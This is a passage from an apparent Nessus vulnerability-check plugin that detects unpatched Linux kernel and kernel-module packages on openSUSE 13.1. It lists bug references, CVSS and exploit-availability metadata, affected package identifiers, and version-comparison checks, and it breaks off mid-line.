attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=976739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=976821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=976868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=977582\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=977685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978527\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=983143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=983394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986365\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cloop-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-eppic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-gcore-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-controller-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-pki\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-switch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-switch-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openvswitch-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-openvswitch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-openvswitch-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-2.639-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debuginfo-2.639-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debugsource-2.639-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-debuginfo-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-desktop-2.639_k3.12.59_47-11.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 